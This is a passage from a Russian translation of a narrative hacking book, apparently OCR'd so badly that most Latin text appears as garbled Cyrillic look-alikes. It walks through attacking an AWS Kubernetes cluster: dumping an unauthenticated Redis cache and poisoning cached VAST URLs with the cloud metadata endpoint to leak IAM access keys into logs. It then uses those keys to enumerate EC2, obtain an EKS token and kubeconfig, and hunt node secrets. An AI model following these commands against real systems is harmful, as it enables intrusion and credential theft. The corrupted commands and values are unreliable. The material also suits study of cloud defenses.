гооє@РоіпЁ1:~/сгеаЕіуеѕ# саЁ 14.5Е_сгеам\е$. хе | \ 
хаг9$ -Т @ аиз 53арі де-оБјесі \ 

-Р 16 \ 

--БисКеЕ $44.тхга4$.сом \ 

--Кеу @ \ 

$ВАМООМ 


Флаг -І – этотокен замены, который определяет, куда вставить про- 
читанную строку. Флаг -Р в хагд$ – это максимальное количество од- 
новременных процессов (16 на моей машине). Наконец, ВАМООМ - это 
переменная Баѕһ по умолчанию, которая возвращает случайное число 
при каждом проходе и будет локальным именем загруженного объяв- 
ления. Давайте посмотрим, сколько рекламных объектов мы нашли: 


гооє@Роіп1:~ /сгеаёіуеѕ# 15 -1 [мс -1 
264 


У нас есть 264 объявления - это 264 сгустка неприязни, отфотошоп- 
ленных изображений, поддельных видео и тщательно подтасованных 
сцен, призванных разобщить людей. Некоторые материалы даже от- 
пугивают людей от голосования. Любые средства хороши, чтобы по- 
лучить желаемый результат выборов. 

Получив эти видеофайлы, мы успешно выполнили задачу номер 5 
из главы 4. Нам еще предстоит выполнить две важные задачи: рас- 
крыть настоящие личности клиентов СР и понять масштабы деятель- 
ности по профилированию данных. 

Мы возвращаемся к нашему списку бакетов 53, надеясь найти под- 
сказки или ссылки на некоторые технологии машинного обучения 
или профилирования (Надоор, Ѕрагк, ЕНик, Үагп, В1®Очегу, Јируѓег 
ит. д.), но не находим ничего значимого, к чему мы можем получить 
доступ. 

Как насчет еще одного компонента в цепочке доставки? В поисках 
вдохновения мы получаем перечень всех подов, работающих в про- 
странстве имен ргод: 


ѕһе11> ./КиБесе\ де ройѕ -п ргой -о=°сиѕот- со1итпѕ=\ 
МОРЕ: .зрес.подеМаме, \ 
РОО: .меёаба+а.паме” 
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Веаіїѕ 


МОРЕ РОБ 


1р-192-168-133-105.еи-... маѕі-сһеск-йер1оутепі-034с-7дхт 
1р-192-168-21-116.еи-... айѕ-гіБ-йер1оутепі-13Ғе-Зеух 
1р-192-168-86-120.еи-...  1аБ-Чер\-694с-б9у$ 
1р-192-168-38-101.еи-...  срм-Гасфог-дер1-396<-34907х 

- - Сокращено- - 


Эти имена подов чрезвычайно загадочны. Рекламный бизнес, как 
и Уолл-стрит, имеет неприятную привычку прятаться за малопонят- 
ными аббревиатурами, которые сеют сомнения и путаницу. Итак, 
после пары часов исследований Википедии в попытке расшифро- 
вать эти названия мы сосредоточим наше внимание на приложении 
айѕ-гіЬ. КТВ означает геа!-Нте рійаіпе - торги в реальном времени, 
протокол, используемый для проведения рекламного аукциона, кото- 
рый приводит к отображению определенного объявления над всеми 
остальными на веб-сайте. 

Каждый раз, когда пользователь загружает страницу веб-сайта, 
имеющего партнерские отношения с МХК Ад$, фрагмент кода ]ауа- 
Ѕсгірё запускает вызов на платформу предложения (ѕирріу-ѕійе рІаї- 
огт, 55Р) МХК АЯ для запуска аукциона. 55Р МХК АЯ передает за- 
прос другим $$Р, рекламным агентствам или брендам для сбора их 
ставок. Каждое агентство, выступая в роли платформы спроса (ӣе- 
тапа-$1ае рІаїѓогт, О5Р), предлагает определенную сумму в долла- 
рах за показ выбранной ими рекламы. Сумма, которую они готовы 
предложить, обычно основана на нескольких критериях: ОКІ-адрес 
веб-сайта, позиция объявления на странице, ключевые слова на стра- 
нице и, что наиболее важно, данные пользователя. Если эти критерии 
подходят клиенту, разместившему рекламу, он повысит ставку. Этот 
аукцион проводится автоматически по протоколу КТВ. 

Возможно, поды ВТВ не имеют доступа к персональным данным 
и просто вслепую передают запросы на серверы, размещенные на СР, 
но судя по тому, насколько важным является протокол КТВ в доставке 
рекламы, эти поды вполне могут приблизить нас к цели еще на один 
шаг. 


и торги в реальном времени 


Мы извлекаем манифест пода ад$-г\%Б: 


Ѕрес: 
сопЁаіпегѕ: 
- \маде: 886371554408. Кг.есг.ео-меѕї-1. атагопамѕ. сот/айѕ- гБ 
--Ѕпір-- 
- \маде: 886371554408 .Кг.есг.ео-меѕї-1. атагопамѕ. сот/гейіѕ- гБ 
пате: гЁБ-сасһе-тет 
рогіѕ: 
- сопёаіпегРогї: 6379 
ргоёосо1: ТСР 
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подеМате: 1р-192-168-21-116.еџ-меѕї-1.сотрие.іпёегпа1 
һоѕЁІР: 192.168.21.116 
ройїрР: 10.59.12.47 


Посмотрите-ка! Контейнер Веа1$ работает вместе с приложением 
КТВ, прослушивая порт 6379. 

Как я уже говорил, нам еще предстоит увидеть базу данных Кейіѕ, 
защищенную аутентификацией во внутренней сети, поэтому вы мо- 
жете себе представить, что наш Вейіѕ, скрывающийся внутри пода 
в кластере Кибегпеѓеѕ, приветствует нас с распростертыми объятия- 
ми. Скачиваем клиента Кейіѕ и переходим к извлечению списка со- 
храненных в базе ключей: 


ѕһе11> аре іпѕёа11 гедіѕ-Еоо15 
ѕһе11> гедіѕ -һ 10.59.12.47 --ѕсап * > а (_гед1$_Кеуз. хе 


ѕһе11> һеай -100 а _ге41$_Кеуз.ЕхЕ 
уаѕі_с886Ь4арза 19аеуеаг 
ѕе1есі_3799ес543582038с 
уаѕї_50317аБ8а4 

- -Сокращено- - 


Каждое приложение ВТВ поставляется с собственным сопутствую- 
щим контейнером Ве4!$, который действует как локальный кеш для 
хранения различных объектов. Ключ ѕе1есі_3799ес54358238с содер- 
жит буквенный объект Јауа, сериализованный в байты. Мы можем 
утверждать это, потому что любой сериализованный объект Јауа име- 
ет маркер шестнадцатеричной строки 00 05 73 72, который мы видим, 
когда запрашиваем значение ключа: 


ѕһе11> гедіѕ -һ 10.59.12.47 де ѕе1есі 3799ес543582638с 
ААМ2сдАбҮ291 т14спЕКсу5уісІиут\у2аих002М0ЈЕЈр2ЕЈ1СХУ1с352уҮ... 
ѕһе11> есһо -пе ААМ2сдАбҮ29+.п14спЕКсуѕуйсІ...| Базеб4 -4 | ххд 
асед 0005 7372 003а 636Ғ 62е 6478 7261 ...... г. : сом.тхга 

6473 2е72 7462 2е52 6573 756с 7453 6574 45.г%Б.Вези Е 5е{$В 


2442 6964 5265 7175 6573 7453 5484 9306 $ВАЧВедиез+....... 
091Ғ еЁ02 0034 Яа... 


Вместо того чтобы снова и снова извлекать один и тот же результат 
из базы данных и нести ненужные затраты на задержку в сети, кон- 
тейнер айѕ-гіЬ хранит предыдущие результаты базы данных (строки, 
объекты и т. д.) в своем локальном кеше контейнера Кеаіѕ. Если позже 
поступит тот же запрос, он почти мгновенно получит соответствую- 
щий результат от Кейіѕ. 
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Эта форма кеширования, вероятно, приветствовалась как фантас- 
тическая идея во время первоначального проектирования приложе- 
ния, но она включает в себя опасную и часто упускаемую из виду опе- 
рацию: десериализацию. 


Десериализация 


Когда объект ]ауа (или объект практически любого языка высокого 
уровня, например Рућоп, С# и т. д.) десериализуется, он преобразу- 
ется обратно из потока байтов в ряд атрибутов, которые заполняют 
реальный объект ]ауа. Этот процесс обычно выполняется методом 
геайоБјесі целевого класса. 

Вот краткий пример, показывающий, что может происходить внут- 
ри айѕ-г+Ь. Где-то в коде приложение загружает массив байтов из 
кеша Ве! и инициализирует входной поток: 


// Вефглеме ѕегіа\1іғеа оБјесі Ғгот Аедіѕ 

Бу+е[] даа = Ғесһра+аЕготАейї() 

// Сгеафе ап іприё ѕёгеат 

Ву{еАггауТпри 5 Егеам Біѕ = пем ВуёеАггауІприёЅЁгеат(аќа); 


Затем эта последовательность байтов используется классом 0Ь- 
јесїІприЁЅёгеат, который реализует метод геайоЬјесі. Этот метод 
извлекает класс, его сигнатуру, а также статические и нестатические 
атрибуты, эффективно преобразовывая последовательность байтов 
в реальный объект ]ауа: 


[/ Создает объект Јама из потока 
ОБјес+ІприЄЅёгеат о15 = пем ОБјесЁІприїЅёгеат(Біѕ); 


1] Вызывает метод геай0Ьјесё класса Б\9Ведиез{ для подготовки исходных данных 
ВіаАедиеѕі објесЁЕготВейіѕ = Ө (ВіаАедиеѕё)оіѕ. геайоЬјесї(); 


Вот где мы можем найти дыру в заборе. Мы не вызывали метод 
геайоБјесі по умолчанию для ОбјесіІприЁЅёгеап, а вместо этого вы- 
звали пользовательский метод геай0Ьјесё, определенный в целевом 
классе ВАЧВедиез+{ Ө. 

Этот пользовательский метод геайоБјесі может делать практиче- 
ски все, что угодно, с данными, которые он получает. В следующем 
скучном сценарии он просто переводит в нижний регистр значение 
атрибута с именем ЁгаЁҒісІр, но в принципе возможно все: он может 
выполнять сетевые вызовы, читать файлы и даже выполнять систем- 
ные команды. И может делать это на основе ввода, полученного от 
недоверенного сериализованного объекта: 


// ВіаВедиеѕё - это класс, который может быть сериализован 
с1аѕ5 ВідАедиеѕ ітр1етепѕ Ѕегіа1іғаБ1е{ 
руБЛАс Ѕёгіпд аисііопІ0р; 
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ргімаёе уоіа геайоБјес (јама. іо.ОБјес їприёЅёгеат іп){ 
1п.деғаи1АеааоБјесї(); 
{11$ .аисТопТО = Ёһіѕ.аисіопІр.оіомегСаѕе(); 
// Выполняем другие операции над атрибутами объекта 


Таким образом, задача состоит в том, чтобы создать сериализован- 
ный объект, который содержит правильные значения и перемещается 
по потоку выполнения метода геай0Бјесі, пока не достигнет выпол- 
нения системной команды или другого интересного результата. Это 
может показаться маловероятным, но именно это пара исследовате- 
лей и сделала пару лет назад. Единственная разница в том, что они 
нашли эту уязвимость в методе геай0Бјесї класса внутри соммоп$-со1- 
Тесііопѕ, библиотеки Јауа, поставляемой по умолчанию в среде вы- 
полнения Јауа (см. доклад «Использование уязвимостей десериализа- 
ции в Јауа» Матиаса Кайзера, ћїрѕ;//уоиѓи.Бе/үіҮЗО-еиүО). 

Вскоре после этого доклада количество уязвимостей десериа- 
лизации едва не конкурировало с эксплойтами Міпаоуѕ. Это было 
невероятно! Метод геай0Ьјесї проблемных классов был исправлен 
в более новых версиях библиотеки соттоп$-соес\оп$ (начиная 
с версии 3.2.2), но поскольку настройка виртуальной машины ]ауа 
(УМ) чаще всего является весьма сложным процессом, основанным 
на фольклоре и древней мудрости, многие компании сопротивляют- 
ся желанию обновить ЈУМ, тем самым оставляя открытую дверь для 
уязвимостей десериализации. 

Прежде всего нам нужно убедиться, что наш под уязвим для этой 
атаки. 

Если вы помните, в главе 5 мы столкнулись с бакетом тхгайѕ - 1, ко- 
торый, вероятно, действовал как частный репозиторий общедоступ- 
ных двоичных и ЈАК-файлов. Этот бакет должен содержать почти все 
версии внешних ]АВ-файлов, используемых такими приложениями, 
как айѕ-гїБ. Следовательно, ответ относительно уязвимости может 
лежать там. Мы ищем по ключу бакета уязвимые библиотеки ]ауа, 
поддерживаемые инструментом уѕоѕегіа1 (/105;//9іһир.сот/гоһоў/ 
узо5ета/), который применяется для создания полезных нагрузок, 
запускающих уязвимости десериализации во многих классах ]ауа. 
На странице инструмента СИНиб перечислены некоторые извест- 
ные библиотеки, которые мы можем использовать, например соп- 
топѕ-со1Лесііопѕ 3.1, ѕргіпд-соге 4.1.4 ит. д. 


гоої@Роіпё1:~/# амѕ 53арі 115&-објесіѕ-у2 --БисКее тхгад$-91 > 115 оБјесёѕ @1.хі 
гооє@Роіп1:~/# дгер ' сомтопѕ-со1Лесёіопѕ' 1151 објесёѕ @1.хі 
Кеу: јаг/тамеп/агі Ғасё/огд.арасһе. соттопѕ - со1Лесёіопѕ /соттопѕ -со1Лесіопѕ/3.3.2 


Находим соттопѕ -со1Лес+іопѕ версии 3.3.2. Удача близко. Мы могли 
бы рискнуть использовать ЭКСПЛОЙТ вслепую, надеясь, что корзина все 


Побег из Кибегпеѓеѕ 171 


еще использует локальную старую версию библиотеки сотмоп$-со1- 
Тес\оп$, но шансы против нас, так что мы продолжим поиск. 


Отравление кеша 


Мы продолжаем изучать другие ключи в кеше Кеаіѕ, надеясь на НОВЫЙ 
источник вдохновения: 


ѕһе11> һеай -100 а _ге41$_Кеуз. ёх 
уаѕ_с8864аЬза 19йеуеаг 
ѕе1есі_3799ес54358238с 
уаѕ&_с8864аЬза 19йеуеаг 

- - Сокращено- - 


Просматриваем содержимое ключа \а$*_с8864аБ34_194е\уеаг и на 
этот раз находим ОВІ: 


ѕһе11> гедіѕ -һ 10.59.12.47 деЁ уаз®_с8854а534_194еуеаг 
һеерѕ : / /имм. доодайѕБу. сот/маѕ/ргеуіеи/9612353 


УАЅТ (\4ео айуегііѕе ѕегуіпе {етр]а(е, шаблон показа видеообъяв- 
лений) - это стандартный ХМІ-шаблон для описания рекламы для 
видеопроигрывателей браузера, включая сведения о том, где загру- 
жать медиафайлы, какие события отслеживания отправлять, через 
сколько секунд, на какую конечную точку и т. д. Вот пример файла 
УАЅТ, указывающего на видеофайл, хранящийся на $44.пхаг4$ . сот, 
для рекламы под названием «Экзотический подход»: 


<МАЅТ уегѕ1оп="3.0"> 
<Аа 10="1594"> 
<Іпііпе> 
<АйЅуѕетРеволюция >МХВ Айѕ</АЅуѕїет> 
<Ааті1е>Экзотический подход</АЧТАе> 
- - Сокращено- - 
<Ме\1аР Де 14="134130" ёуре="үійео/тр4" 
Біёгаёе="626" мійЄһ="1280" Һеідһ="720"> 
һер: //544.тхгайѕ.сот/43е09014730сЬ/12а182436/у14/720/8864а1сҒ2.тр4 
- - Сокращено- - 


Парсеры ХМІ. бывают такими нестабильными - один неправиль- 
ный тег, и вся конструкция рассыпалась. При сбое парсер выдает трас- 
сировки стека большего размера, чем исходный файл, в стандартный 
вывод ошибок. Так много исключений, которые нужно правильно об- 
рабатывать... и заносить в журнал! 

Чувствуете, к чему я клоню? У нас уже есть доступ к подам, обра- 
батывающим журналы приложений, связанные с доставкой рекламы. 
Если мы заменим ОВГ-адрес УАЗТ, скажем, ОВГ-адресом АРІ мета- 
данных, который отвечает в формате ]ЗОМ или в текстовом формате, 
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отправит ли приложение подробный отчет об ошибке в хранилище 
аудита Е1аѕіісѕеагсһ, которое мы можем просмотреть? 

Есть только один способ проверить это. Мы заменяем дюжину дей- 
ствительных ОВГ-адресов УАЗТ печально известным ОВГ-адресом 
конечной точки һіЁр: //169.254.169. 254/1аіеѕї/теёа-даёа/іат/іпҒо, 
например так: 


ѕһе11> гедіѕ -һ 10.59.12.47 ѕеЁ уаз®_с8864а534_194еуеаг\ 
ВЕЕр: //169.254.169.254/1аёеѕі/те+а-даёа/іат/іпҒо 
ок 


Эта конечная точка метаданных должна возвращать ответ ]5ОМ, 
содержащий роль ТАМ, привязанную к узлу, на котором запущен под 
айѕ-гіБ. Мы знаем, что эта роль существует, потому что она требуется 
ЕКЗ. Бонусом у этой роли есть несколько интересных привилегий. 

Чтобы сработала одна из отравленных записей кеша, требует- 
ся добрых 10 минут, но мы, наконец, получаем подробную ошибку, 
на которую надеялись. Мы можем найти ошибку в индексе журна- 
ла, выполнив поиск идентификатора учетной записи АҮ/Ѕ МХК А45 
886371554408: 


ѕһе11> сиг1 “10.20.86.24:9200/109/_ѕеагсһ?ргеёу&ѕі2е=1084=теѕѕаде: 886371554408” 


"Леме1": "Сгііса1" 

"меѕѕаде": "...\"Тп${апсеРго ДеАгп\" : 

\" агп:амѕ:іат: :886477354405 :іпѕёапсе-ргоҒіЛе/екѕ -могкегѕ -ргой- соттоп -М№одеТп$апсеРго Де - 
Вл0рЄбрСОКЕСС\". . „ого. хті.. зах. ЅАХРагѕеЕхсерёлоп. . .№& ма1іа ХМЕ ҒіЛе" 


Под, вызвавший запрос, работаетсрольюІАМекѕ -иогКег$ -рго4-соп- 
топ - №одеІпѕапсеРгоЁ11е -В71060С0КЕСС. Все, что нам нужно сделать 
сейчас, – это еще раз отравить кеш Веаіѕ, но на этот раз добавить 
к ОВГ-адресу имя роли, чтобы получить ее временные ключи доступа: 


Ѕһе11> гедіѕ -һ 10.59.12.47 зеф уа$®_с8864аБ34_194еуеаг\ 

Һер: //169.254.169.254/1а+еѕі/теёа-даёа/іат/ѕесигіёу-сгейепЕіа15 /екѕ-могкегѕргой- 
соттоп -М№ойеІпѕапсеВо1е-В20060С0КЕСС 

ок 


Через несколько минут мы получаем наш заветный приз, действи- 
тельные ключи доступа А\М5 с привилегиями узла ЕК$ в индексе жур- 
нала: 


ѕһе11> сиг1 “10.20.86.24:9200 /1.09 /_зеагс|?рге{у&$12е=10&4=теззаде: Ассез$Кеут4” 


"Леме1": "Сгііса1" 
"меѕѕаде": "...\"Ассез$Кеу!4\" : \"АЗТА447ВК6И$ЗВ647РОТ\", \"ЅесгеЁАссеѕ5Кеу\" : 
\"+Ер125.. .огд.хті..ѕах. ЅАХРагѕеЕхсеріёлоп. . .№& ма14іа ХМЕ Ғе" 
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Согласно документации А\М/5, роль по умолчанию, прикреплен- 
ная к узлу КиБегпеез, будет иметь базовые разрешения ЕС2 для об- 
наружения его среды: йеѕсгіђе-іпѕіапсеѕ, йеѕсгібе- ѕесигіїу-дгоирѕ, 
деѕсгібе-уо1џтеѕ, деѕсгібе-ѕџирпеЁѕ и т. д. Давайте возьмем эти но- 
вые учетные данные и получим список всех экземпляров в регионе 
еџ-меѕї-1 (Ирландия): 


гооё@Роіпё1:~/# мі -/.ам$ /сгейепЕ\а15 

[поде] 

амѕ_ассеѕ5_Кеу ій = А$ТА447ВК6М$38647РОТ 

амѕ_ѕесгеЁ ассеѕ5 Кеу = +Ер1250ти/5г/+В/+Ј5РгѕтВламхуккј 
амѕ_5еѕѕіоп_Ёокеп = АдоЈЬ3Јр2210Х2... 


гооё@РоіпЁ1:~/# амѕ ес2 беѕсгібе-іпѕапсеѕ \ 
- -гедіоп=еџ-меѕё-1 \ 
--ргоҒіЛе поде 
- - Сокращено- - 
"ІпѕЁапсеІй": "1-080729394115154ас", 
"ІпѕёапсеТуре": "с5.4х1агде", 
"КеуМате": "КиБе-пойе-Кеу", 
"[ацпсбТАме": "2019-09 -18719:47:31.0002", 
"РгімаёерпѕМате": "1р-192-168-12-33.еџ-меѕ-1.сотриїе.іпёегпа1", 
"РгіуаёеІрАййгеѕ5": "192.168.12.33", 
"РиБ1лсІрАййгеѕ5": "34.245.211.33", 
"ЅаёеТгапѕіёіопАеаѕоп": "" 
"ЅирпеІа": "зибпет-00580е48", 
"Тадѕ": [ 
{ 
"Кеу": "К85.1о/с1иѕЁег-аџёоѕса1ег/ргой-еџм1", 
"Уа1ие": "гие" 


Н, 


- - Сокращено- - 


На первый взгляд, вывод выглядит великолепно. Мы получили пол- 
ные описания примерно 700 машин ЕС2, включая их частные и об- 
щедоступные ІР-адреса, правила брандмауэра, типы машин и многое 
другое. Но для компании масштаба МХК Ад 700 машин - это неболь- 
шое количество. Что-то здесь не так. 

Все машины, которые мы получили, имеют специальный тег К85. 
1о/с1иѕег-аџёоѕса1ег/ргой-еџм1. Это общий тег, используемый 
инструментом автомасштабирования (һ#р5;//9/іһир.сот/Кирегпеїеѕ/ 
аиѓоѕса!1ег/) для обозначения одноразовых узлов, которые можно от- 
ключить, когда активность подов снижается. МХЕ АЯ, вероятно, вос- 
пользовались этим тегом, чтобы ограничить область разрешений по 
умолчанию, назначенных узлам Киђегпеѓеѕ. Умный подход на самом 
деле. 

По иронии судьбы тег выдает имя кластера Кирегпеѓеѕ (ргод-ецм1), 
которое является обязательным параметром при вызове АРІ дезсг\ - 
БеС1иѕїег. Так давайте же его вызовем: 
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гооЁ@Роіпї1:~/# ехрогЕ АМ$_ВЕСТОМ=еи-ме$*-1 
гооЁ@Роіпї1:~/# амѕ екѕ йеѕсгіђе-с1иѕёег --пате ргод-еии1 --рго Де поде 
{ "с1иѕёег": { 
Ө "епароіпї": "ҺЕ&рѕ: //ВВ06170457С63.у14.еи-мез{-1.еК$.атагопаи$.сот", 
Ө "го1еАгп": "агп:амѕ : Тат: :886477354405:го1е/екѕ-ргой-го1е", 

"урсІа": "үрс-05с5909е232012771", 

"епароіпЕРиБ14сАссеѕѕ": Ға1ѕе, 

"епароіпЕРгімаЁеАссеѕѕ": Ёгие, 
- - Сокращено- - 


Сервер АРІ – это длинный ОВГ-адрес с удобным названием епй- 
роіпї Ө. В некоторых редких конфигурациях он может быть доступен 
в открытом интернете, что значительно упрощает запрос/изменение 
желаемого состояния кластера. 

Роль, которую мы получили ®, может делать гораздо больше, чем 
просто исследовать ресурсы Киђегпеќеѕ. По умолчанию эта роль имеет 
право присоединять любую группу безопасности к любому другому 
узлу в кластере. Теперь, когда мы заполучили эту роль, нам просто 
нужно найти существующую группу безопасности, которая предо- 
ставляет доступ к каждому порту в интернете - она всегда есть, – и на- 
значить ее машине, на которой размещена наша текущая оболочка. 

Но не так быстро. Хотя может показаться заманчивым превра- 
тить нашу обратную оболочку ручной работы на основе 53 в пол- 
ноценный дуплексный канал связи, весьма вероятно, что МХЕ Айѕ 
применила к своему кластеру Кибегпеѓеѕ конфигуратор Тегга ог, 
объявив, сколько машин в идеале должно работать, как должна 
выглядеть их сетевая конфигурация и какие группы безопасности 
назначены каждой машине. Если мы изменим эти параметры, из- 
менение будет обнаружено следующей командой ЁеггаЁогт р1ап. 
Наличие группы безопасности, разрешающей весь входящий тра- 
фик случайному узлу, может вызвать только вопросы, которых мы 
бы предпочли избежать. 

Мы продолжаем играть с ролью, привязанной к узлу КиБегпее$, но 
она быстро достигает предела своих возможностей. Мы можем полу- 
чить только общую информацию о компонентах кластера. У нас нет 
доступа к пользовательским данным машин, и мы вряд ли можем 
что-то изменить без особого разрешения. 

Если вдуматься, почему мы рассматриваем этот узел только как ре- 
сурс АМ/5? Это прежде всего ресурс КиБегпе$. Привилегированный 
при этом. У этого узла могут быть смехотворные разрешения в среде 
АМГ, но при этом он может быть высшим божеством в мире Киђегпе- 
сеѕ, поскольку он буквально имеет право раздавать жизнь и смерть 
подам в своем царстве. 

Как я уже говорил, на каждом узле есть работающий процесс под 
названием Кибе1еї, который опрашивает сервер АРІ на наличие но- 
вых подов для запуска или завершения. Запуск контейнеров означает 
монтирование томов, внедрение секретов... как, черт возьми, он до- 
стигает такого уровня доступа? 


Побег из Кибегпеѓеѕ 175 


Ответ: через профиль экземпляра узла - роль, которая у нас была 
все это время. 

Когда вы настраиваете кластер Кибегпе{е$ на ЕК$, одной из первых 
конфигураций, которые необходимо применить еще до запуска уз- 
лов, является добавление имени роли узла ІАМ в группу зуз{ет: подез. 
Эта группа привязана к роли Киђегпеѓеѕ зуз{емт: поде, которая имеет 
права на чтение различных объектов КиБегпетез: сервисов, узлов, мо- 
дулей, постоянных томов и 18 других ресурсов! 

Все, что нам нужно сделать, чтобы унаследовать эти полномочия, — 
это попросить АМГ5 преобразовать наши ключи доступа ІАМ в дей- 
ствительный токен Кибегпеѓеѕ, чтобы мы могли запрашивать сервер 
АРІ как действительный член группы ѕуѕёет:пойеѕ. Для этого мы вы- 
зываем АРІ де*-+оКеп: 


гооЁ@Роіп1:~/# амз екѕ де{-фоКеп - -с1иѕїег-пате ргод-еци1 --рго Де поде 


{ 
"Кіпа": "ЕхесСгейепёіа1", 
"аріМегѕіоп": "с1лепё. аџћепісаёіоп.К85.1о/у1а1рһа1", 
"ѕёаёиѕ": { 
"ехрігаёіопТітеѕёатр": "2019-11-14721:04:231", 
"океп": "К85-амѕ -у1. анКдсНМ6у92НМиҮи1һепт. .. " 
} 
} 


Токен, который мы получаем на этот раз, не является стандарт- 
ным МТ; теперь он содержит строительные блоки вызова АРІ беї- 
Са1ЛегІйепїі+у службы 5Т$. 

Давайте декодируем часть токена, который мы получили ранее, ис- 
пользуя комбинацию јд, сиї, Баѕеб4 и ѕеа: 


гооЁ@Роіпї1:~/# амѕ екѕ деё-Еокеп --с1иѕёег-пате ргод-еци1 \ 
| 39 -г .5Еаёиѕ.Еокеп \ 

| си -9”_” -Е2 \ 

| Базеб4 -а \ 

| ѕеа “$/&/\п/9” 


ВЕ брз: //515 .амахопамз . сот/?Ас1оп=бе{СаДегТдеп {у 

&\/ег$10п=2011-06-15 

&Х-Ат2 -А1догіЁһт=АИ54-НМАС-5НА256 
&Х-Ат2-Сгедеп1а1=А5ТА447ВКбИ$У05ЕТ4№5%2Е20191118 /и5-еа${-1/${$/амз4_гедие${ 
8Х-Ат2 -Рраёе=2019111872042397 

&Х-Ат2-Ехрігеѕ=60 

&Х-Ат2 - ЅідпейНеайегѕ=һоѕї; х-К85-амѕ-14 

&Х-Атг -Ѕесигіёу-Токеп=1003637Јр2210Х21јЕІХ/////... 


ЈМҮТ на самом деле представляет собой закодированный предва- 
рительно подписанный ОВГ-адрес, который заверяет идентичность 
узла. Любой желающий может посетить этот ОВГ, чтобы убедиться, 
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что узел действительно является тем, за кого себя выдает. Именно это 
и делает ЕК$ при получении данного токена. Точно так же, как А\М/5 
ТАМ доверяет Ореп О идентификацию и аутентификацию пользова- 
телей Кибегпеѓеѕ посредством МТ, ЕКЅ доверяет [АМ делать то же са- 
мое через веб-вызов конечной точки $%5.атагоп. сом. 

Мы можем использовать этот токен в команде сиг для сервера АРІ, 
как мы это делали ранее, но лучше сгенерировать полную конфигу- 
рацию Кибесі, которую мы можем загрузить в наш доверенный под: 


гоої@Роіпё1:~/# амз екѕ ирдафе-Кибесоп{!19 - -пате ргод-ецм1 - -ргоЁіЛе поде 


ОрдафеЧ сопфехЕ агп:амѕ :екѕ :ео-меѕ&-1:886477354405 : с1и{ег/ргод-еци1 іп /гоо*/.КиБе/соп19 
ѕһе11> идее һірѕ: //тхгайѕ-агсһімеѕ -раскеЁѕ -11пих.53-еџ-меѕё-1. атагопамѕ. сот/сопЁід 


ѕһе11> ткдіг -р /гооЁ/.Кибе 88 ср сопҒід /гоої/.КиБе/ 


Быстрый способ проверить, получили ли мы новые привилегии, – 
перечислить модули в священном пространстве имен КиБе-зуз{ем. 
Это пространство имен, которое содержит основные модули – КиђБе 
ар\-зег\уег, еЁсӣ, согейпѕ – и другие важные модули, используемые 
для администрирования Киђегпеѓеѕ. Помните, что наши предыдущие 
токены были ограничены пространством имен ргод, поэтому получе- 
ние доступа к Киђе-ѕуѕїеп было бы огромным шагом вперед: 


ѕһе11> Киесі деф ройѕ -п Кибе-ѕуѕёем 


МАМЕ ВЕАБУ ЅТАТОЅ ВЕЗТАВТ5 АСЕ 
амѕ -пойе-һ1227 1/1 Киппіпя 0 82т 
амѕ -пойе-у7һгс 1/1 Киппіпя 0 83т 
согедп$-759461с95{1-6297и 1/1 Киппіпя 0 89т 
согейпѕ-75906#с95#-пёд88 1/1 Киппіпя 0 89т 
Кибе-ргоху-724јі 1/1 Киппіпя 0 83т 
Кибе-ргоху-дс22 1/1 КВиппіпя 0 82т 
- -Сокращено- - 


Нам удалось получить список подов! Замечательно! Очевидно, что 
поскольку мы находимся в управляемом АҮ/Ѕ Кибегпеѓеѕ, Ататоп 
скрывает самые важные модули (Киђе-аріѕегмег, еса, киБе-сопёго11 - 
егтападег), но остальные модули остаются. 


Повышение привилегий Киретее; 


Давайте использовать наши новые привилегии с пользой. Первым 
делом нам нужно получить все секреты, определенные в Кибегпеѓеѕ; 
однако когда мы попробуем это сделать, то обнаружим, что хотя груп- 
па ѕуѕёет: пойеѕ технически имеет на это разрешение, она не может 
произвольно запрашивать секреты: 
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ѕһе11> Кобес деф ѕесгеЁѕ --аД-памезрасе$ 


Еггог Ёгот зегуег (ЕогБіадеп): ѕесгеёѕ 15 ҒогБіайеп: 

Џѕег "ѕуѕёет: пойе:1р-192-168-98-157.еџ-меѕі-1. сотриќе.іпёегпа1" саппо{ 115% 
геѕоигсе "ѕесгеЁѕ" іп АРІ дгоир "" а {Не с\из%ег ѕсоре: сап оп1у геай 
памезрасед оБјесі оЁ +һіѕ Ёуре 


Функция безопасности, представленная в Кибегпеќеѕ версии 1.10, 
ограничивает чрезмерные возможности узлов путем авторизации. 
Эта функция дополняет классическое управление доступом на основе 
ролей. Узел может использовать свою способность извлекать секрет 
только в том случае, если на этом же узле есть запланированные поды, 
которым нужен этот секрет. Когда эти поды завершают работу, узел 
теряет доступ к секрету. 

Впрочем, причин для паники нет. Любой случайный узел обычно 
содержит десятки, если не сотни, различных подов в любой момент 
времени, каждый со своими грязными секретами, объемными дан- 
ными и так далее. Возможно, сегодня в 23:00 наш узел сможет по- 
лучить только пароль фиктивной базы данных, но дайте ему 350 ми- 
нут, и Кибе-ѕсһейџег отправит узлу под с правами администратора 
кластера. Все дело в том, чтобы оказаться в нужном узле в нужный 
момент. Мы запрашиваем перечень подов, работающих на текущей 
машине, чтобы узнать, какие секреты мы имеем право получать: 


ѕһе11> Кобес деф ройѕ --а\11-патеѕрасеѕ - -Ғіе14-ѕе1есёог\ 
Ѕрес.пойеМћате=1р-192-168-21-116.еџ-меѕ-1. сотриёе.іпёегпаї 


ргоа айѕ-гёр-дер1оутепё-13Ғе-Зеух 1/1 Виппіпд 
ргоа айѕ-г&р-дер1оутепё-120с-5сѕ5ѕ 1/1 Виппіпд 
ргоа Ка#Ка- Ғеейег-йер1оутепё-23ее 1/1 Аџппіпд 
ѕадіпд дідіба1 -е1етепёѕ -дер1оу-83се 1/1 Виппіпд 
їеѕі Ғ.аѕк-дер1оутепё-5076с-др5ёх 1/1 Виппіпд 
- - Сокращено- - 


На этом единственном узле размещается множество разнородных 
приложений. Это выглядит многообещающим. Узел, вероятно, будет 
иметь доступ к большому количеству секретов, охватывающих раз- 
личные компоненты. Воспользуемся нашим пользовательским пар- 
сером для автоматического вывода списка секретов, смонтирован- 
ных каждым подом: 


ѕһе11> ./КиБесе\ деф ройѕ -0=”си$Фот-со\итп$=\ 

№: .теёада+а.памеѕрасе, \ 

РОО: .теёада+а. папе, \ 

ЕМУ: . ѕрес. сопЁаіпегѕ[* ].епу[*] .уа\иеЕгоп. зесге{Кеувеф, \ 

ЕТЕЕЗЕСВЕТ: .зрес.уо\имез[*].зесге+.зесге{Маме” \ 

--а-памезрасе$ \ 

--Ғіе1й-ѕе1есёог зрес.подеМате=р-192-168-21-116.еи-ие$*-1.сотри{е .1пегпа\ 
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№ РОЮ ЕМУ ЕТЕЗЕСВЕТ 


